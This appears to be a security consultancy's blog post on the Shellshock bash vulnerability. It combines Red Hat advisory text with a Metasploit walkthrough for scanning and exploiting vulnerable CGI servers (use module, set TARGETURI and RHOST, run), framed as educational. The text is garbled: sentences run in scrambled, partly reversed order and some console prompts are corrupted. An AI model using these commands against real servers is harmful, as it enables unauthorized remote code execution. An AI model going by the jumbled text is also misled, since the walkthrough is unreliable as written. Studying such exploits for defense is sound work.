Updated bash packages that address CVE-2014-7169 are now available for Red Hat Enterprise Linux 4, 5, 6, and 7, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support, and Shift_JIS for Red Hat Enterprise Linux 5 and 6. The new issue has been assigned CVE-2014-7169. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. Malware is circulating that exploits this vulnerability. Please refer to the FAQ for further information. Two new flaws have been reported that are mitigated by the currently available Bash packages. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. This vulnerability CVE-2014-6271 could allow for arbitrary code execution. Try out a few different ways and see for your self why it is so dangerous.Red Hat has been made aware of a vulnerability affecting all versions of the bash package as shipped with Red Hat products. There are many ways to expoit this vulnerability. Msf exploit(apache_mod_cgi_bash_env_exec) > run Msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi Msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
Msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec Once a vulnerable system is discovered, it can be exploited using the following module: Msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > run Msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi Msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set RHOSTS Msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env Once launched, use the following commands to scan for vulnerable systems: Let's try one.Start by launching Metasploit. > exploits/osx/local/vmware_bash_function_root.rb > exploits/multi/http/apache_mod_cgi_bash_env_exec.rb > auxiliary/scanner/http/apache_mod_cgi_bash_env.rb There are already many Metasploit modules evailable for Shellshock including:
Shellshock was another one of those exploits that was very impactful across the IT industry.
TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS. TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY.
0 kommentar(er)
